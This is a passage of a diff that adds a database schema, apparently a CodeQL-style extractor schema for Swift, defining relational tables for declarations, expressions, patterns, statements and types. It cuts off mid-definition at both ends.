+ int naming_declaration: @value_decl_or_none ref +); + +#keyset[id, index] +opaque_type_decl_opaque_generic_params( //dir=decl + int id: @opaque_type_decl ref, + int index: int ref, + int opaque_generic_param: @generic_type_param_type_or_none ref +); + +param_decls( //dir=decl + unique int id: @param_decl +); + +#keyset[id] +param_decl_is_inout( //dir=decl + int id: @param_decl ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_var_bindings( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_vars( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var: @var_decl_or_none ref +); + +type_alias_decls( //dir=decl + unique int id: @type_alias_decl, + int aliased_type: @type_or_none ref +); + +class_decls( //dir=decl + unique int id: @class_decl +); + +enum_decls( //dir=decl + unique int id: @enum_decl +); + +protocol_decls( //dir=decl + unique int id: @protocol_decl +); + +struct_decls( //dir=decl + unique int id: @struct_decl +); + +arguments( //dir=expr + unique int id: @argument, + string label: string ref, + int expr: @expr_or_none ref +); + +@expr = + @any_try_expr +| @applied_property_wrapper_expr +| @apply_expr +| @assign_expr +| @bind_optional_expr +| @capture_list_expr +| @closure_expr +| @collection_expr +| @consume_expr +| @copy_expr +| @decl_ref_expr +| @default_argument_expr +| @discard_assignment_expr +| @dot_syntax_base_ignored_expr +| @dynamic_type_expr +| @enum_is_case_expr +| @error_expr +| @explicit_cast_expr +| @force_value_expr +| @identity_expr +| @if_expr +| @implicit_conversion_expr +| @in_out_expr +| @key_path_application_expr +| @key_path_dot_expr +| @key_path_expr +| @lazy_initialization_expr +| @literal_expr +| @lookup_expr +| @make_temporarily_escapable_expr +| @materialize_pack_expr +| @obj_c_selector_expr +| @one_way_expr +| @opaque_value_expr +| @open_existential_expr +| @optional_evaluation_expr +| @other_initializer_ref_expr +| @overloaded_decl_ref_expr +| @pack_element_expr +| @pack_expansion_expr +| @property_wrapper_value_placeholder_expr +| @rebind_self_in_initializer_expr +| @sequence_expr +| @single_value_stmt_expr +| @super_ref_expr +| @tap_expr +| @tuple_element_expr +| @tuple_expr +| @type_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @vararg_expansion_expr +; + +#keyset[id] +expr_types( //dir=expr + int id: @expr ref, + int type_: @type_or_none ref +); + +@any_try_expr = + @force_try_expr +| @optional_try_expr +| @try_expr +; + +#keyset[id] +any_try_exprs( //dir=expr + int id: @any_try_expr ref, + int sub_expr: @expr_or_none ref +); + +applied_property_wrapper_exprs( //dir=expr + unique int id: @applied_property_wrapper_expr, + int kind: int ref, + int value: @expr_or_none ref, + int param: @param_decl_or_none ref +); + +@apply_expr = + @binary_expr +| @call_expr +| @postfix_unary_expr +| @prefix_unary_expr +| @self_apply_expr +; + +#keyset[id] +apply_exprs( //dir=expr + int id: @apply_expr ref, + int function: @expr_or_none ref +); + +#keyset[id, index] +apply_expr_arguments( //dir=expr + int id: @apply_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +assign_exprs( //dir=expr + unique int id: @assign_expr, + int dest: @expr_or_none ref, + int source: @expr_or_none ref +); + +bind_optional_exprs( //dir=expr + unique int id: @bind_optional_expr, + int sub_expr: @expr_or_none ref +); + +capture_list_exprs( //dir=expr + unique int id: @capture_list_expr, + int closure_body: @closure_expr_or_none ref +); + +#keyset[id, index] +capture_list_expr_binding_decls( //dir=expr + int id: @capture_list_expr ref, + int index: int ref, + int binding_decl: @pattern_binding_decl_or_none ref +); + +@closure_expr = + @auto_closure_expr +| @explicit_closure_expr +; + +@collection_expr = + @array_expr +| @dictionary_expr +; + +consume_exprs( //dir=expr + unique int id: @consume_expr, + int sub_expr: @expr_or_none ref +); + +copy_exprs( //dir=expr + unique int id: @copy_expr, + int sub_expr: @expr_or_none ref +); + +decl_ref_exprs( //dir=expr + unique int id: @decl_ref_expr, + int decl: @decl_or_none ref +); + +#keyset[id, index] +decl_ref_expr_replacement_types( //dir=expr + int id: @decl_ref_expr ref, + int index: int ref, + int replacement_type: @type_or_none ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_ordinary_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +default_argument_exprs( //dir=expr + unique int id: @default_argument_expr, + int param_decl: @param_decl_or_none ref, + int param_index: int ref +); + +#keyset[id] +default_argument_expr_caller_side_defaults( //dir=expr + int id: @default_argument_expr ref, + int caller_side_default: @expr_or_none ref +); + +discard_assignment_exprs( //dir=expr + unique int id: @discard_assignment_expr +); + +dot_syntax_base_ignored_exprs( //dir=expr + unique int id: @dot_syntax_base_ignored_expr, + int qualifier: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +dynamic_type_exprs( //dir=expr + unique int id: @dynamic_type_expr, + int base: @expr_or_none ref +); + +enum_is_case_exprs( //dir=expr + unique int id: @enum_is_case_expr, + int sub_expr: @expr_or_none ref, + int element: @enum_element_decl_or_none ref +); + +error_exprs( //dir=expr + unique int id: @error_expr +); + +@explicit_cast_expr = + @checked_cast_expr +| @coerce_expr +; + +#keyset[id] +explicit_cast_exprs( //dir=expr + int id: @explicit_cast_expr ref, + int sub_expr: @expr_or_none ref +); + +force_value_exprs( //dir=expr + unique int id: @force_value_expr, + int sub_expr: @expr_or_none ref +); + +@identity_expr = + @await_expr +| @borrow_expr +| @dot_self_expr +| @paren_expr +| @unresolved_member_chain_result_expr +; + +#keyset[id] +identity_exprs( //dir=expr + int id: @identity_expr ref, + int sub_expr: @expr_or_none ref +); + +if_exprs( //dir=expr + unique int id: @if_expr, + int condition: @expr_or_none ref, + int then_expr: @expr_or_none ref, + int else_expr: @expr_or_none ref +); + +@implicit_conversion_expr = + @abi_safe_conversion_expr +| @any_hashable_erasure_expr +| @archetype_to_super_expr +| @array_to_pointer_expr +| @bridge_from_obj_c_expr +| @bridge_to_obj_c_expr +| @class_metatype_to_object_expr +| @collection_upcast_conversion_expr +| @conditional_bridge_from_obj_c_expr +| @covariant_function_conversion_expr +| @covariant_return_conversion_expr +| @derived_to_base_expr +| @destructure_tuple_expr +| @differentiable_function_expr +| @differentiable_function_extract_original_expr +| @erasure_expr +| @existential_metatype_to_object_expr +| @foreign_object_conversion_expr +| @function_conversion_expr +| @in_out_to_pointer_expr +| @inject_into_optional_expr +| @linear_function_expr +| @linear_function_extract_original_expr +| @linear_to_differentiable_function_expr +| @load_expr +| @metatype_conversion_expr +| @pointer_to_pointer_expr +| @protocol_metatype_to_object_expr +| @string_to_pointer_expr +| @underlying_to_opaque_expr +| @unevaluated_instance_expr +| @unresolved_type_conversion_expr +; + +#keyset[id] +implicit_conversion_exprs( //dir=expr + int id: @implicit_conversion_expr ref, + int sub_expr: @expr_or_none ref +); + +in_out_exprs( //dir=expr + unique int id: @in_out_expr, + int sub_expr: @expr_or_none ref +); + +key_path_application_exprs( //dir=expr + unique int id: @key_path_application_expr, + int base: @expr_or_none ref, + int key_path: @expr_or_none ref +); + +key_path_dot_exprs( //dir=expr + unique int id: @key_path_dot_expr +); + +key_path_exprs( //dir=expr + unique int id: @key_path_expr +); + +#keyset[id] +key_path_expr_roots( //dir=expr + int id: @key_path_expr ref, + int root: @type_repr_or_none ref +); + +#keyset[id, index] +key_path_expr_components( //dir=expr + int id: @key_path_expr ref, + int index: int ref, + int component: @key_path_component_or_none ref +); + +lazy_initialization_exprs( //dir=expr + unique int id: @lazy_initialization_expr, + int sub_expr: @expr_or_none ref +); + +@literal_expr = + @builtin_literal_expr +| @interpolated_string_literal_expr +| @nil_literal_expr +| @object_literal_expr +| @regex_literal_expr +; + +@lookup_expr = + @dynamic_lookup_expr +| @member_ref_expr +| @subscript_expr +; + +#keyset[id] +lookup_exprs( //dir=expr + int id: @lookup_expr ref, + int base: @expr_or_none ref +); + +#keyset[id] +lookup_expr_members( //dir=expr + int id: @lookup_expr ref, + int member: @decl_or_none ref +); + +make_temporarily_escapable_exprs( //dir=expr + unique int id: @make_temporarily_escapable_expr, + int escaping_closure: @opaque_value_expr_or_none ref, + int nonescaping_closure: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +materialize_pack_exprs( //dir=expr + unique int id: @materialize_pack_expr, + int sub_expr: @expr_or_none ref +); + +obj_c_selector_exprs( //dir=expr + unique int id: @obj_c_selector_expr, + int sub_expr: @expr_or_none ref, + int method: @function_or_none ref +); + +one_way_exprs( //dir=expr + unique int id: @one_way_expr, + int sub_expr: @expr_or_none ref +); + +opaque_value_exprs( //dir=expr + unique int id: @opaque_value_expr +); + +open_existential_exprs( //dir=expr + unique int id: @open_existential_expr, + int sub_expr: @expr_or_none ref, + int existential: @expr_or_none ref, + int opaque_expr: @opaque_value_expr_or_none ref +); + +optional_evaluation_exprs( //dir=expr + unique int id: @optional_evaluation_expr, + int sub_expr: @expr_or_none ref +); + +other_initializer_ref_exprs( //dir=expr + unique int id: @other_initializer_ref_expr, + int initializer: @initializer_or_none ref +); + +overloaded_decl_ref_exprs( //dir=expr + unique int id: @overloaded_decl_ref_expr +); + +#keyset[id, index] +overloaded_decl_ref_expr_possible_declarations( //dir=expr + int id: @overloaded_decl_ref_expr ref, + int index: int ref, + int possible_declaration: @value_decl_or_none ref +); + +pack_element_exprs( //dir=expr + unique int id: @pack_element_expr, + int sub_expr: @expr_or_none ref +); + +pack_expansion_exprs( //dir=expr + unique int id: @pack_expansion_expr, + int pattern_expr: @expr_or_none ref +); + +property_wrapper_value_placeholder_exprs( //dir=expr + unique int id: @property_wrapper_value_placeholder_expr, + int placeholder: @opaque_value_expr_or_none ref +); + +#keyset[id] +property_wrapper_value_placeholder_expr_wrapped_values( //dir=expr + int id: @property_wrapper_value_placeholder_expr ref, + int wrapped_value: @expr_or_none ref +); + +rebind_self_in_initializer_exprs( //dir=expr + unique int id: @rebind_self_in_initializer_expr, + int sub_expr: @expr_or_none ref, + int self: @var_decl_or_none ref +); + +sequence_exprs( //dir=expr + unique int id: @sequence_expr +); + +#keyset[id, index] +sequence_expr_elements( //dir=expr + int id: @sequence_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +single_value_stmt_exprs( //dir=expr + unique int id: @single_value_stmt_expr, + int stmt: @stmt_or_none ref +); + +super_ref_exprs( //dir=expr + unique int id: @super_ref_expr, + int self: @var_decl_or_none ref +); + +tap_exprs( //dir=expr + unique int id: @tap_expr, + int body: @brace_stmt_or_none ref, + int var: @var_decl_or_none ref +); + +#keyset[id] +tap_expr_sub_exprs( //dir=expr + int id: @tap_expr ref, + int sub_expr: @expr_or_none ref +); + +tuple_element_exprs( //dir=expr + unique int id: @tuple_element_expr, + int sub_expr: @expr_or_none ref, + int index: int ref +); + +tuple_exprs( //dir=expr + unique int id: @tuple_expr +); + +#keyset[id, index] +tuple_expr_elements( //dir=expr + int id: @tuple_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +type_exprs( //dir=expr + unique int id: @type_expr +); + +#keyset[id] +type_expr_type_reprs( //dir=expr + int id: @type_expr ref, + int type_repr: @type_repr_or_none ref +); + +unresolved_decl_ref_exprs( //dir=expr + unique int id: @unresolved_decl_ref_expr +); + +#keyset[id] +unresolved_decl_ref_expr_names( //dir=expr + int id: @unresolved_decl_ref_expr ref, + string name: string ref +); + +unresolved_dot_exprs( //dir=expr + unique int id: @unresolved_dot_expr, + int base: @expr_or_none ref, + string name: string ref +); + +unresolved_member_exprs( //dir=expr + unique int id: @unresolved_member_expr, + string name: string ref +); + +unresolved_pattern_exprs( //dir=expr + unique int id: @unresolved_pattern_expr, + int sub_pattern: @pattern_or_none ref +); + +unresolved_specialize_exprs( //dir=expr + unique int id: @unresolved_specialize_expr, + int sub_expr: @expr_or_none ref +); + +vararg_expansion_exprs( //dir=expr + unique int id: @vararg_expansion_expr, + int sub_expr: @expr_or_none ref +); + +abi_safe_conversion_exprs( //dir=expr + unique int id: @abi_safe_conversion_expr +); + +any_hashable_erasure_exprs( //dir=expr + unique int id: @any_hashable_erasure_expr +); + +archetype_to_super_exprs( //dir=expr + unique int id: @archetype_to_super_expr +); + +array_exprs( //dir=expr + unique int id: @array_expr +); + +#keyset[id, index] +array_expr_elements( //dir=expr + int id: @array_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +array_to_pointer_exprs( //dir=expr + unique int id: @array_to_pointer_expr +); + +auto_closure_exprs( //dir=expr + unique int id: @auto_closure_expr +); + +await_exprs( //dir=expr + unique int id: @await_expr +); + +binary_exprs( //dir=expr + unique int id: @binary_expr +); + +borrow_exprs( //dir=expr + unique int id: @borrow_expr +); + +bridge_from_obj_c_exprs( //dir=expr + unique int id: @bridge_from_obj_c_expr +); + +bridge_to_obj_c_exprs( //dir=expr + unique int id: @bridge_to_obj_c_expr +); + +@builtin_literal_expr = + @boolean_literal_expr +| @magic_identifier_literal_expr +| @number_literal_expr +| @string_literal_expr +; + +call_exprs( //dir=expr + unique int id: @call_expr +); + +@checked_cast_expr = + @conditional_checked_cast_expr +| @forced_checked_cast_expr +| @is_expr +; + +class_metatype_to_object_exprs( //dir=expr + unique int id: @class_metatype_to_object_expr +); + +coerce_exprs( //dir=expr + unique int id: @coerce_expr +); + +collection_upcast_conversion_exprs( //dir=expr + unique int id: @collection_upcast_conversion_expr +); + +conditional_bridge_from_obj_c_exprs( //dir=expr + unique int id: @conditional_bridge_from_obj_c_expr +); + +covariant_function_conversion_exprs( //dir=expr + unique int id: @covariant_function_conversion_expr +); + +covariant_return_conversion_exprs( //dir=expr + unique int id: @covariant_return_conversion_expr +); + +derived_to_base_exprs( //dir=expr + unique int id: @derived_to_base_expr +); + +destructure_tuple_exprs( //dir=expr + unique int id: @destructure_tuple_expr +); + +dictionary_exprs( //dir=expr + unique int id: @dictionary_expr +); + +#keyset[id, index] +dictionary_expr_elements( //dir=expr + int id: @dictionary_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +differentiable_function_exprs( //dir=expr + unique int id: @differentiable_function_expr +); + +differentiable_function_extract_original_exprs( //dir=expr + unique int id: @differentiable_function_extract_original_expr +); + +dot_self_exprs( //dir=expr + unique int id: @dot_self_expr +); + +@dynamic_lookup_expr = + @dynamic_member_ref_expr +| @dynamic_subscript_expr +; + +erasure_exprs( //dir=expr + unique int id: @erasure_expr +); + +existential_metatype_to_object_exprs( //dir=expr + unique int id: @existential_metatype_to_object_expr +); + +explicit_closure_exprs( //dir=expr + unique int id: @explicit_closure_expr +); + +force_try_exprs( //dir=expr + unique int id: @force_try_expr +); + +foreign_object_conversion_exprs( //dir=expr + unique int id: @foreign_object_conversion_expr +); + +function_conversion_exprs( //dir=expr + unique int id: @function_conversion_expr +); + +in_out_to_pointer_exprs( //dir=expr + unique int id: @in_out_to_pointer_expr +); + +inject_into_optional_exprs( //dir=expr + unique int id: @inject_into_optional_expr +); + +interpolated_string_literal_exprs( //dir=expr + unique int id: @interpolated_string_literal_expr +); + +#keyset[id] +interpolated_string_literal_expr_interpolation_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int interpolation_expr: @opaque_value_expr_or_none ref +); + +#keyset[id] +interpolated_string_literal_expr_appending_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int appending_expr: @tap_expr_or_none ref +); + +linear_function_exprs( //dir=expr + unique int id: @linear_function_expr +); + +linear_function_extract_original_exprs( //dir=expr + unique int id: @linear_function_extract_original_expr +); + +linear_to_differentiable_function_exprs( //dir=expr + unique int id: @linear_to_differentiable_function_expr +); + +load_exprs( //dir=expr + unique int id: @load_expr +); + +member_ref_exprs( //dir=expr + unique int id: @member_ref_expr +); + +#keyset[id] +member_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_ordinary_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @member_ref_expr ref +); + +metatype_conversion_exprs( //dir=expr + unique int id: @metatype_conversion_expr +); + +nil_literal_exprs( //dir=expr + unique int id: @nil_literal_expr +); + +object_literal_exprs( //dir=expr + unique int id: @object_literal_expr, + int kind: int ref +); + +#keyset[id, index] +object_literal_expr_arguments( //dir=expr + int id: @object_literal_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +optional_try_exprs( //dir=expr + unique int id: @optional_try_expr +); + +paren_exprs( //dir=expr + unique int id: @paren_expr +); + +pointer_to_pointer_exprs( //dir=expr + unique int id: @pointer_to_pointer_expr +); + +postfix_unary_exprs( //dir=expr + unique int id: @postfix_unary_expr +); + +prefix_unary_exprs( //dir=expr + unique int id: @prefix_unary_expr +); + +protocol_metatype_to_object_exprs( //dir=expr + unique int id: @protocol_metatype_to_object_expr +); + +regex_literal_exprs( //dir=expr + unique int id: @regex_literal_expr, + string pattern: string ref, + int version: int ref +); + +@self_apply_expr = + @dot_syntax_call_expr +| @initializer_ref_call_expr +; + +#keyset[id] +self_apply_exprs( //dir=expr + int id: @self_apply_expr ref, + int base: @expr_or_none ref +); + +string_to_pointer_exprs( //dir=expr + unique int id: @string_to_pointer_expr +); + +subscript_exprs( //dir=expr + unique int id: @subscript_expr +); + +#keyset[id, index] +subscript_expr_arguments( //dir=expr + int id: @subscript_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +#keyset[id] +subscript_expr_has_direct_to_storage_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_ordinary_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_distributed_thunk_semantics( //dir=expr + int id: @subscript_expr ref +); + +try_exprs( //dir=expr + unique int id: @try_expr +); + +underlying_to_opaque_exprs( //dir=expr + unique int id: @underlying_to_opaque_expr +); + +unevaluated_instance_exprs( //dir=expr + unique int id: @unevaluated_instance_expr +); + +unresolved_member_chain_result_exprs( //dir=expr + unique int id: @unresolved_member_chain_result_expr +); + +unresolved_type_conversion_exprs( //dir=expr + unique int id: @unresolved_type_conversion_expr +); + +boolean_literal_exprs( //dir=expr + unique int id: @boolean_literal_expr, + boolean value: boolean ref +); + +conditional_checked_cast_exprs( //dir=expr + unique int id: @conditional_checked_cast_expr +); + +dot_syntax_call_exprs( //dir=expr + unique int id: @dot_syntax_call_expr +); + +dynamic_member_ref_exprs( //dir=expr + unique int id: @dynamic_member_ref_expr +); + +dynamic_subscript_exprs( //dir=expr + unique int id: @dynamic_subscript_expr +); + +forced_checked_cast_exprs( //dir=expr + unique int id: @forced_checked_cast_expr +); + +initializer_ref_call_exprs( //dir=expr + unique int id: @initializer_ref_call_expr +); + +is_exprs( //dir=expr + unique int id: @is_expr +); + +magic_identifier_literal_exprs( //dir=expr + unique int id: @magic_identifier_literal_expr, + string kind: string ref +); + +@number_literal_expr = + @float_literal_expr +| @integer_literal_expr +; + +string_literal_exprs( //dir=expr + unique int id: @string_literal_expr, + string value: string ref +); + +float_literal_exprs( //dir=expr + unique int id: @float_literal_expr, + string string_value: string ref +); + +integer_literal_exprs( //dir=expr + unique int id: @integer_literal_expr, + string string_value: string ref +); + +@pattern = + @any_pattern +| @binding_pattern +| @bool_pattern +| @enum_element_pattern +| @expr_pattern +| @is_pattern +| @named_pattern +| @optional_some_pattern +| @paren_pattern +| @tuple_pattern +| @typed_pattern +; + +#keyset[id] +pattern_types( //dir=pattern + int id: @pattern ref, + int type_: @type_or_none ref +); + +any_patterns( //dir=pattern + unique int id: @any_pattern +); + +binding_patterns( //dir=pattern + unique int id: @binding_pattern, + int sub_pattern: @pattern_or_none ref +); + +bool_patterns( //dir=pattern + unique int id: @bool_pattern, + boolean value: boolean ref +); + +enum_element_patterns( //dir=pattern + unique int id: @enum_element_pattern, + int element: @enum_element_decl_or_none ref +); + +#keyset[id] +enum_element_pattern_sub_patterns( //dir=pattern + int id: @enum_element_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +expr_patterns( //dir=pattern + unique int id: @expr_pattern, + int sub_expr: @expr_or_none ref +); + +is_patterns( //dir=pattern + unique int id: @is_pattern +); + +#keyset[id] +is_pattern_cast_type_reprs( //dir=pattern + int id: @is_pattern ref, + int cast_type_repr: @type_repr_or_none ref +); + +#keyset[id] +is_pattern_sub_patterns( //dir=pattern + int id: @is_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +named_patterns( //dir=pattern + unique int id: @named_pattern, + int var_decl: @var_decl_or_none ref +); + +optional_some_patterns( //dir=pattern + unique int id: @optional_some_pattern, + int sub_pattern: @pattern_or_none ref +); + +paren_patterns( //dir=pattern + unique int id: @paren_pattern, + int sub_pattern: @pattern_or_none ref +); + +tuple_patterns( //dir=pattern + unique int id: @tuple_pattern +); + +#keyset[id, index] +tuple_pattern_elements( //dir=pattern + int id: @tuple_pattern ref, + int index: int ref, + int element: @pattern_or_none ref +); + +typed_patterns( //dir=pattern + unique int id: @typed_pattern, + int sub_pattern: @pattern_or_none ref +); + +#keyset[id] +typed_pattern_type_reprs( //dir=pattern + int id: @typed_pattern ref, + int type_repr: @type_repr_or_none ref +); + +case_label_items( //dir=stmt + unique int id: @case_label_item, + int pattern: @pattern_or_none ref +); + +#keyset[id] +case_label_item_guards( //dir=stmt + int id: @case_label_item ref, + int guard: @expr_or_none ref +); + +condition_elements( //dir=stmt + unique int id: @condition_element +); + +#keyset[id] +condition_element_booleans( //dir=stmt + int id: @condition_element ref, + int boolean_: @expr_or_none ref +); + +#keyset[id] +condition_element_patterns( //dir=stmt + int id: @condition_element ref, + int pattern: @pattern_or_none ref +); + +#keyset[id] +condition_element_initializers( //dir=stmt + int id: @condition_element ref, + int initializer: @expr_or_none ref +); + +#keyset[id] +condition_element_availabilities( //dir=stmt + int id: @condition_element ref, + int availability: @availability_info_or_none ref +); + +@stmt = + @brace_stmt +| @break_stmt +| @case_stmt +| @continue_stmt +| @defer_stmt +| @discard_stmt +| @fail_stmt +| @fallthrough_stmt +| @labeled_stmt +| @pound_assert_stmt +| @return_stmt +| @then_stmt +| @throw_stmt +| @yield_stmt +; + +stmt_conditions( //dir=stmt + unique int id: @stmt_condition +); + +#keyset[id, index] +stmt_condition_elements( //dir=stmt + int id: @stmt_condition ref, + int index: int ref, + int element: @condition_element_or_none ref +); + +brace_stmts( //dir=stmt + unique int id: @brace_stmt +); + +#keyset[id, index] +brace_stmt_elements( //dir=stmt + int id: @brace_stmt ref, + int index: int ref, + int element: @ast_node_or_none ref +); + +break_stmts( //dir=stmt + unique int id: @break_stmt +); + +#keyset[id] +break_stmt_target_names( //dir=stmt + int id: @break_stmt ref, + string target_name: string ref +); + +#keyset[id] +break_stmt_targets( //dir=stmt + int id: @break_stmt ref, + int target: @stmt_or_none ref +); + +case_stmts( //dir=stmt + unique int id: @case_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +case_stmt_labels( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int label: @case_label_item_or_none ref +); + +#keyset[id, index] +case_stmt_variables( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +continue_stmts( //dir=stmt + unique int id: @continue_stmt +); + +#keyset[id] +continue_stmt_target_names( //dir=stmt + int id: @continue_stmt ref, + string target_name: string ref +); + +#keyset[id] +continue_stmt_targets( //dir=stmt + int id: @continue_stmt ref, + int target: @stmt_or_none ref +); + +defer_stmts( //dir=stmt + unique int id: @defer_stmt, + int body: @brace_stmt_or_none ref +); + +discard_stmts( //dir=stmt + unique int id: @discard_stmt, + int sub_expr: @expr_or_none ref +); + +fail_stmts( //dir=stmt + unique int id: @fail_stmt +); + +fallthrough_stmts( //dir=stmt + unique int id: @fallthrough_stmt, + int fallthrough_source: @case_stmt_or_none ref, + int fallthrough_dest: @case_stmt_or_none ref +); + +@labeled_stmt = + @do_catch_stmt +| @do_stmt +| @for_each_stmt +| @labeled_conditional_stmt +| @repeat_while_stmt +| @switch_stmt +; + +#keyset[id] +labeled_stmt_labels( //dir=stmt + int id: @labeled_stmt ref, + string label: string ref +); + +pound_assert_stmts( //dir=stmt + unique int id: @pound_assert_stmt, + int condition: @expr_or_none ref, + string message: string ref +); + +return_stmts( //dir=stmt + unique int id: @return_stmt +); + +#keyset[id] +return_stmt_results( //dir=stmt + int id: @return_stmt ref, + int result: @expr_or_none ref +); + +then_stmts( //dir=stmt + unique int id: @then_stmt, + int result: @expr_or_none ref +); + +throw_stmts( //dir=stmt + unique int id: @throw_stmt, + int sub_expr: @expr_or_none ref +); + +yield_stmts( //dir=stmt + unique int id: @yield_stmt +); + +#keyset[id, index] +yield_stmt_results( //dir=stmt + int id: @yield_stmt ref, + int index: int ref, + int result: @expr_or_none ref +); + +do_catch_stmts( //dir=stmt + unique int id: @do_catch_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +do_catch_stmt_catches( //dir=stmt + int id: @do_catch_stmt ref, + int index: int ref, + int catch: @case_stmt_or_none ref +); + +do_stmts( //dir=stmt + unique int id: @do_stmt, + int body: @brace_stmt_or_none ref +); + +for_each_stmts( //dir=stmt + unique int id: @for_each_stmt, + int pattern: @pattern_or_none ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +for_each_stmt_variables( //dir=stmt + int id: @for_each_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +#keyset[id] +for_each_stmt_wheres( //dir=stmt + int id: @for_each_stmt ref, + int where: @expr_or_none ref +); + +#keyset[id] +for_each_stmt_iterator_vars( //dir=stmt + int id: @for_each_stmt ref, + int iteratorVar: @pattern_binding_decl_or_none ref +); + +#keyset[id] +for_each_stmt_next_calls( //dir=stmt + int id: @for_each_stmt ref, + int nextCall: @expr_or_none ref +); + +@labeled_conditional_stmt = + @guard_stmt +| @if_stmt +| @while_stmt +; + +#keyset[id] +labeled_conditional_stmts( //dir=stmt + int id: @labeled_conditional_stmt ref, + int condition: @stmt_condition_or_none ref +); + +repeat_while_stmts( //dir=stmt + unique int id: @repeat_while_stmt, + int condition: @expr_or_none ref, + int body: @stmt_or_none ref +); + +switch_stmts( //dir=stmt + unique int id: @switch_stmt, + int expr: @expr_or_none ref +); + +#keyset[id, index] +switch_stmt_cases( //dir=stmt + int id: @switch_stmt ref, + int index: int ref, + int case_: @case_stmt_or_none ref +); + +guard_stmts( //dir=stmt + unique int id: @guard_stmt, + int body: @brace_stmt_or_none ref +); + +if_stmts( //dir=stmt + unique int id: @if_stmt, + int then: @stmt_or_none ref +); + +#keyset[id] +if_stmt_elses( //dir=stmt + int id: @if_stmt ref, + int else: @stmt_or_none ref +); + +while_stmts( //dir=stmt + unique int id: @while_stmt, + int body: @stmt_or_none ref +); + +@type = + @any_function_type +| @any_generic_type +| @any_metatype_type +| @builtin_type +| @dependent_member_type +| @dynamic_self_type +| @error_type +| @existential_type +| @in_out_type +| @l_value_type +| @module_type +| @pack_element_type +| @pack_expansion_type +| @pack_type +| @parameterized_protocol_type +| @protocol_composition_type +| @reference_storage_type +| @substitutable_type +| @sugar_type +| @tuple_type +| @unresolved_type +; + +#keyset[id] +types( //dir=type + int id: @type ref, + string name: string ref, + int canonical_type: @type_or_none ref +); + +type_reprs( //dir=type + unique int id: @type_repr, + int type_: @type_or_none ref +); + +@any_function_type = + @function_type +| @generic_function_type +; + +#keyset[id] +any_function_types( //dir=type + int id: @any_function_type ref, + int result: @type_or_none ref +); + +#keyset[id, index] +any_function_type_param_types( //dir=type + int id: @any_function_type ref, + int index: int ref, + int param_type: @type_or_none ref +); + +#keyset[id] +any_function_type_is_throwing( //dir=type + int id: @any_function_type ref +); + +#keyset[id] +any_function_type_is_async( //dir=type + int id: @any_function_type ref +); + +@any_generic_type = + @nominal_or_bound_generic_nominal_type +| @unbound_generic_type +; + +#keyset[id] +any_generic_types( //dir=type + int id: @any_generic_type ref, + int declaration: @generic_type_decl_or_none ref +); + +#keyset[id] +any_generic_type_parents( //dir=type + int id: @any_generic_type ref, + int parent: @type_or_none ref +); + +@any_metatype_type = + @existential_metatype_type +| @metatype_type +; + +@builtin_type = + @any_builtin_integer_type +| @builtin_bridge_object_type +| @builtin_default_actor_storage_type +| @builtin_executor_type +| @builtin_float_type +| @builtin_job_type +| @builtin_native_object_type +| @builtin_raw_pointer_type +| @builtin_raw_unsafe_continuation_type +| @builtin_unsafe_value_buffer_type +| @builtin_vector_type +; + +dependent_member_types( //dir=type + unique int id: @dependent_member_type, + int base_type: @type_or_none ref, + int associated_type_decl: @associated_type_decl_or_none ref +); + +dynamic_self_types( //dir=type + unique int id: @dynamic_self_type, + int static_self_type: @type_or_none ref +); + +error_types( //dir=type + unique int id: @error_type +); + +existential_types( //dir=type + unique int id: @existential_type, + int constraint: @type_or_none ref +); + +in_out_types( //dir=type + unique int id: @in_out_type, + int object_type: @type_or_none ref +); + +l_value_types( //dir=type + unique int id: @l_value_type, + int object_type: @type_or_none ref +); + +module_types( //dir=type + unique int id: @module_type, + int module: @module_decl_or_none ref +); + +pack_element_types( //dir=type + unique int id: @pack_element_type, + int pack_type: @type_or_none ref +); + +pack_expansion_types( //dir=type + unique int id: @pack_expansion_type, + int pattern_type: @type_or_none ref, + int count_type: @type_or_none ref +); + +pack_types( //dir=type + unique int id: @pack_type +); + +#keyset[id, index] +pack_type_elements( //dir=type + int 